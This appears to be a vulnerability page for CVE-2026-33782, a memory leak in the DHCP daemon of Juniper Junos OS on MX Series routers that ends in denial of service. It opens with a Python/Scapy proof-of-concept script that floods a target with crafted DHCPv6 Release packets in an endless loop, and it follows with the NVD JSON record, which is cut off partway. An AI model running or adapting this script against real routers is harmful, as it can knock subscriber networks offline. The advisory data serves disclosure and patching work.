CVE-2026-33782

import time from scapy.all import * # Target Configuration # Replace with the actual MAC and interface of the target environment target_mac = "00:11:22:33:44:55" interface = "eth0" # Construct Ethernet and IPv6 headers eth = Ether(dst=target_mac) ipv6 = IPv6(dst="ff02::1:2") # DHCPv6 All_DHCP_Relay_Agents_and_Servers # Construct UDP header for DHCPv6 (Client port 546 -> Server port 547) udp = UDP(sport=546, dport=547) # DHCPv6 Release Message (MsgType 8) # This simulates a subscriber logging out/releasing the lease dhcp6_release = DHCP6(msgtype=8) # Add necessary options (Simplified for PoC demonstration) # In a real scenario, valid ServerID (Option 2) and ClientID (Option 1) are required dhcp6_release = dhcp6_release / DHCP6OptServerID(duid=DUID_LL(lladdr="aa:bb:cc:dd:ee:ff")) dhcp6_release = dhcp6_release / DHCP6OptClientID(duid=DUID_LL(lladdr="11:22:33:44:55:66")) # Assemble the full packet packet = eth / ipv6 / udp / dhcp6_release print("[*] Starting PoC for CVE-2026-33782...") print("[*] Sending DHCPv6 Release packets to trigger memory leak...") try: while True: # Send the crafted packet sendp(packet, iface=interface, verbose=0) print("[+] Sent one DHCPv6 Release packet") # Wait briefly to simulate subscriber logout interval time.sleep(0.5) except KeyboardInterrupt: print("\n[*] PoC execution stopped by user.")

{"cve": {"id": "CVE-2026-33782", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:27.393", "lastModified": "2026-04-17T17:39:35.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Missing Release of Memory after Effective Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series, allows an adjacent, unauthenticated attacker to cause a memory leak, that will eventually cause a complete Denial-of-Service (DoS).\n\nIn a DHCPv6 over PPPoE, or DHCPv6 over VLAN with Active lease query or Bulk lease query scenario, every subscriber logout will leak a small amount of memory. When all available memory has been exhausted, jdhcpd will crash and restart which causes a complete service impact until the process has recovered.\n\nThe memory usage of jdhcpd can be monitored with:\n\nuser@host> show system processes extensive | match jdhcpd\n\n\n\nThis issue affects Junos OS:\n\n * all versions before 22.4R3-S1,\n * 23.2 versions before 23.2R2,\n * 23.4 versions before 23.4R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870BC30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "40813417-A938-4F74-A419-8C5188A35486"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "7FC1BA1A-DF0E-4B15-86BA-24C60E546732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EBB967BF-3495-476D-839A-9DBFCBE69F91"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3:*:*:*:*:*:*", "matchCriteriaId": "7E5688D6-DCA4-4550-9CD1-A3D792252129"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.2:-:*:*:*:*:*:*", "matchCriteriaId": "1A78CC80-E8B1-4CDA-BB35-A61833657FA7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.2:r1:*:*:*:*:*:*", "matchCriteriaId": "4B3B2FE1-C228-46BE-AC76-70C2687050AE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:23.2:r1-s1:*:*:*:*:*:*", "matchCrit ... (truncated)